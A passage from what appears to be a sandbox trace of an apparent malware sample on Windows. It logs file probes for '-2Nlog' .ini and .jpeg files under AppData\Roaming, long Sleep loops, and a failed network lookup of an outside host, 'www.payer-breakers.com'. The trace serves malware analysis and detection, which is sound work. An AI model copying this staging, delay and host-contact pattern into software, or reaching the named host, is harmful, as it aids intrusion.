NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.260] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.260] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892abf0) returned 1 [0194.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.260] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.260] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.260] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0194.260] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.260] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.261] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.261] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b7c0) returned 1 [0194.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.261] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.261] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0194.261] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892c150) returned 1 [0194.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.261] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0194.261] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0194.261] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892b190) returned 1 [0194.261] Sleep (dwMilliseconds=0x7d0) [0194.262] Sleep (dwMilliseconds=0x7d0) [0194.264] Sleep (dwMilliseconds=0x7d0) [0194.265] Sleep (dwMilliseconds=0x7d0) [0194.267] Sleep (dwMilliseconds=0x7d0) [0194.268] Sleep (dwMilliseconds=0x7d0) [0194.270] Sleep (dwMilliseconds=0x7d0) [0194.271] Sleep (dwMilliseconds=0x7d0) [0194.273] Sleep (dwMilliseconds=0x7d0) [0194.274] Sleep (dwMilliseconds=0x7d0) [0194.276] Sleep (dwMilliseconds=0x7d0) [0194.277] Sleep (dwMilliseconds=0x7d0) [0194.279] Sleep (dwMilliseconds=0x7d0) [0194.280] Sleep (dwMilliseconds=0x7d0) [0194.282] Sleep (dwMilliseconds=0x7d0) [0194.283] Sleep (dwMilliseconds=0x7d0) [0194.285] Sleep (dwMilliseconds=0x7d0) [0194.286] Sleep (dwMilliseconds=0x7d0) [0194.288] Sleep (dwMilliseconds=0x7d0) [0194.289] Sleep (dwMilliseconds=0x7d0) [0194.291] Sleep (dwMilliseconds=0x7d0) [0194.292] Sleep (dwMilliseconds=0x7d0) [0194.294] Sleep (dwMilliseconds=0x7d0) [0194.295] Sleep (dwMilliseconds=0x7d0) [0194.298] Sleep (dwMilliseconds=0x7d0) [0194.299] Sleep (dwMilliseconds=0x7d0) [0194.301] Sleep (dwMilliseconds=0x7d0) [0194.302] Sleep (dwMilliseconds=0x7d0) [0194.304] Sleep (dwMilliseconds=0x7d0) [0194.305] Sleep (dwMilliseconds=0x7d0) [0194.307] Sleep (dwMilliseconds=0x7d0) [0194.308] Sleep (dwMilliseconds=0x7d0) [0194.310] Sleep (dwMilliseconds=0x7d0) [0194.311] Sleep (dwMilliseconds=0x7d0) [0194.313] Sleep (dwMilliseconds=0x7d0) [0194.314] Sleep (dwMilliseconds=0x7d0) [0194.316] Sleep (dwMilliseconds=0x7d0) [0194.317] Sleep (dwMilliseconds=0x7d0) [0194.319] Sleep (dwMilliseconds=0x7d0) [0194.320] Sleep (dwMilliseconds=0x7d0) [0194.322] Sleep (dwMilliseconds=0x7d0) [0194.323] Sleep (dwMilliseconds=0x7d0) [0194.325] Sleep (dwMilliseconds=0x7d0) [0194.326] Sleep (dwMilliseconds=0x7d0) [0194.328] Sleep (dwMilliseconds=0x7d0) [0194.329] Sleep (dwMilliseconds=0x7d0) [0194.331] Sleep (dwMilliseconds=0x7d0) [0194.332] Sleep (dwMilliseconds=0x7d0) [0194.334] Sleep (dwMilliseconds=0x7d0) [0194.335] Sleep (dwMilliseconds=0x7d0) [0194.337] Sleep (dwMilliseconds=0x7d0) [0194.338] Sleep (dwMilliseconds=0x7d0) [0194.340] Sleep (dwMilliseconds=0x7d0) [0194.341] Sleep (dwMilliseconds=0x7d0) [0194.343] Sleep (dwMilliseconds=0x7d0) [0194.344] Sleep (dwMilliseconds=0x7d0) [0194.346] Sleep (dwMilliseconds=0x7d0) [0194.347] Sleep (dwMilliseconds=0x7d0) [0194.349] Sleep (dwMilliseconds=0x7d0) [0194.350] Sleep (dwMilliseconds=0x7d0) [0194.352] Sleep (dwMilliseconds=0x7d0) [0194.353] Sleep (dwMilliseconds=0x7d0) [0194.355] Sleep (dwMilliseconds=0x7d0) [0194.356] Sleep (dwMilliseconds=0x7d0) [0194.358] Sleep (dwMilliseconds=0x7d0) [0194.359] Sleep (dwMilliseconds=0x7d0) [0194.361] Sleep (dwMilliseconds=0x7d0) [0194.362] Sleep (dwMilliseconds=0x7d0) [0194.364] Sleep (dwMilliseconds=0x7d0) [0194.365] Sleep (dwMilliseconds=0x7d0) [0194.367] Sleep (dwMilliseconds=0x7d0) [0194.368] Sleep (dwMilliseconds=0x7d0) [0194.370] Sleep (dwMilliseconds=0x7d0) [0194.371] Sleep (dwMilliseconds=0x7d0) [0194.373] Sleep (dwMilliseconds=0x7d0) [0194.374] Sleep (dwMilliseconds=0x7d0) [0194.376] Sleep (dwMilliseconds=0x7d0) [0194.377] Sleep (dwMilliseconds=0x7d0) [0194.379] Sleep (dwMilliseconds=0x7d0) [0194.380] Sleep (dwMilliseconds=0x7d0) [0194.382] Sleep (dwMilliseconds=0x7d0) [0194.383] Sleep (dwMilliseconds=0x7d0) [0194.385] Sleep (dwMilliseconds=0x7d0) [0194.386] Sleep (dwMilliseconds=0x7d0) [0194.388] Sleep (dwMilliseconds=0x7d0) [0194.389] Sleep (dwMilliseconds=0x7d0) [0194.391] Sleep (dwMilliseconds=0x7d0) [0194.392] Sleep (dwMilliseconds=0x7d0) [0194.394] Sleep (dwMilliseconds=0x7d0) [0194.395] Sleep (dwMilliseconds=0x7d0) [0194.398] Sleep (dwMilliseconds=0x7d0) [0194.399] Sleep (dwMilliseconds=0x7d0) [0194.401] Sleep (dwMilliseconds=0x7d0) [0194.402] Sleep (dwMilliseconds=0x7d0) [0194.404] Sleep (dwMilliseconds=0x7d0) [0194.405] Sleep (dwMilliseconds=0x7d0) [0194.407] Sleep (dwMilliseconds=0x7d0) [0194.408] Sleep (dwMilliseconds=0x7d0) [0194.410] Sleep (dwMilliseconds=0x7d0) [0194.411] Sleep (dwMilliseconds=0x7d0) [0194.413] Sleep (dwMilliseconds=0x7d0) [0194.414] Sleep (dwMilliseconds=0x7d0) [0194.416] Sleep (dwMilliseconds=0x7d0) [0194.417] Sleep (dwMilliseconds=0x7d0) [0194.419] Sleep (dwMilliseconds=0x7d0) [0194.420] Sleep (dwMilliseconds=0x7d0) [0194.422] Sleep (dwMilliseconds=0x7d0) [0194.423] Sleep (dwMilliseconds=0x7d0) [0194.425] Sleep (dwMilliseconds=0x7d0) [0194.426] Sleep (dwMilliseconds=0x7d0) [0194.428] Sleep (dwMilliseconds=0x7d0) [0194.429] Sleep (dwMilliseconds=0x7d0) [0194.431] Sleep (dwMilliseconds=0x7d0) [0194.432] Sleep (dwMilliseconds=0x7d0) [0194.434] Sleep (dwMilliseconds=0x7d0) [0194.435] Sleep (dwMilliseconds=0x7d0) [0194.437] Sleep (dwMilliseconds=0x7d0) [0194.438] Sleep (dwMilliseconds=0x7d0) [0194.440] Sleep (dwMilliseconds=0x7d0) [0194.441] Sleep (dwMilliseconds=0x7d0) [0194.443] Sleep (dwMilliseconds=0x7d0) [0194.444] Sleep (dwMilliseconds=0x7d0) [0194.446] Sleep (dwMilliseconds=0x7d0) [0194.447] Sleep (dwMilliseconds=0x7d0) [0194.449] Sleep (dwMilliseconds=0x7d0) [0194.450] Sleep (dwMilliseconds=0x7d0) [0194.452] Sleep (dwMilliseconds=0x7d0) [0194.453] Sleep (dwMilliseconds=0x7d0) [0194.455] Sleep (dwMilliseconds=0x7d0) [0194.456] Sleep (dwMilliseconds=0x7d0) [0194.473] Sleep (dwMilliseconds=0x7d0) [0194.475] Sleep (dwMilliseconds=0x7d0) [0194.476] Sleep (dwMilliseconds=0x7d0) [0194.478] Sleep (dwMilliseconds=0x7d0) [0194.479] Sleep (dwMilliseconds=0x7d0) [0194.481] Sleep (dwMilliseconds=0x7d0) [0194.482] Sleep (dwMilliseconds=0x7d0) [0194.484] Sleep (dwMilliseconds=0x7d0) [0194.485] Sleep (dwMilliseconds=0x7d0) [0194.487] Sleep (dwMilliseconds=0x7d0) [0194.488] Sleep (dwMilliseconds=0x7d0) [0194.490] Sleep (dwMilliseconds=0x7d0) [0194.491] Sleep (dwMilliseconds=0x7d0) [0194.493] Sleep (dwMilliseconds=0x7d0) [0194.494] Sleep (dwMilliseconds=0x7d0) [0194.496] Sleep (dwMilliseconds=0x7d0) [0194.499] Sleep (dwMilliseconds=0x7d0) [0194.500] Sleep (dwMilliseconds=0x7d0) [0194.501] Sleep (dwMilliseconds=0x7d0) [0194.503] Sleep (dwMilliseconds=0x7d0) [0194.504] Sleep (dwMilliseconds=0x7d0) [0194.506] Sleep (dwMilliseconds=0x7d0) [0194.507] Sleep (dwMilliseconds=0x7d0) [0194.509] Sleep (dwMilliseconds=0x7d0) [0194.510] Sleep (dwMilliseconds=0x7d0) [0194.512] Sleep (dwMilliseconds=0x7d0) [0194.513] Sleep (dwMilliseconds=0x7d0) [0194.515] Sleep (dwMilliseconds=0x7d0) [0194.516] Sleep (dwMilliseconds=0x7d0) [0194.518] Sleep (dwMilliseconds=0x7d0) [0194.519] Sleep (dwMilliseconds=0x7d0) [0194.521] Sleep (dwMilliseconds=0x7d0) [0194.522] Sleep (dwMilliseconds=0x7d0) [0194.524] Sleep (dwMilliseconds=0x7d0) [0194.525] Sleep (dwMilliseconds=0x7d0) [0194.527] Sleep (dwMilliseconds=0x7d0) [0194.528] Sleep (dwMilliseconds=0x7d0) [0194.530] Sleep (dwMilliseconds=0x7d0) [0194.531] Sleep (dwMilliseconds=0x7d0) [0194.533] Sleep (dwMilliseconds=0x7d0) [0194.534] Sleep (dwMilliseconds=0x7d0) [0194.536] Sleep (dwMilliseconds=0x7d0) [0194.537] Sleep (dwMilliseconds=0x7d0) [0194.539] Sleep (dwMilliseconds=0x7d0) [0194.540] Sleep (dwMilliseconds=0x7d0) [0194.542] Sleep (dwMilliseconds=0x7d0) [0194.543] Sleep (dwMilliseconds=0x7d0) [0194.545] Sleep (dwMilliseconds=0x7d0) [0194.546] Sleep (dwMilliseconds=0x7d0) [0194.548] Sleep (dwMilliseconds=0x7d0) [0194.549] Sleep (dwMilliseconds=0x7d0) [0194.551] Sleep (dwMilliseconds=0x7d0) [0194.552] Sleep (dwMilliseconds=0x7d0) [0194.554] Sleep (dwMilliseconds=0x7d0) [0194.555] Sleep (dwMilliseconds=0x7d0) [0194.557] Sleep (dwMilliseconds=0x7d0) [0194.558] Sleep (dwMilliseconds=0x7d0) [0194.560] Sleep (dwMilliseconds=0x7d0) [0194.561] Sleep (dwMilliseconds=0x7d0) [0194.563] Sleep (dwMilliseconds=0x7d0) [0194.565] Sleep (dwMilliseconds=0x7d0) [0194.567] Sleep (dwMilliseconds=0x7d0) [0194.568] Sleep (dwMilliseconds=0x7d0) [0194.569] Sleep (dwMilliseconds=0x7d0) [0194.571] Sleep (dwMilliseconds=0x7d0) [0194.572] Sleep (dwMilliseconds=0x7d0) [0194.574] Sleep (dwMilliseconds=0x7d0) [0194.575] Sleep (dwMilliseconds=0x7d0) [0194.577] Sleep (dwMilliseconds=0x7d0) [0194.578] Sleep (dwMilliseconds=0x7d0) [0194.635] Sleep (dwMilliseconds=0x7d0) [0194.636] Sleep (dwMilliseconds=0x7d0) [0194.638] socket (af=2, type=1, protocol=6) returned 0x267c [0194.638] getaddrinfo (in: pNodeName="www.payer-breakers.com", pServiceName="80", pHints=0x8790d18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x8790d48 | out: ppResult=0x8790d48*=0x0) returned 11002 [0197.610] Sleep (dwMilliseconds=0x7d0) [0197.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.612] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0197.612] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894dba0) returned 1 [0197.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.612] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.612] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0197.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.612] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.612] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0197.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.612] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.612] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e0b0) returned 1 [0197.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.612] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.612] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.612] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d840) returned 1 [0197.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.613] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.613] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894c490) returned 1 [0197.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.613] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0197.613] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0197.613] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0197.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.613] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, 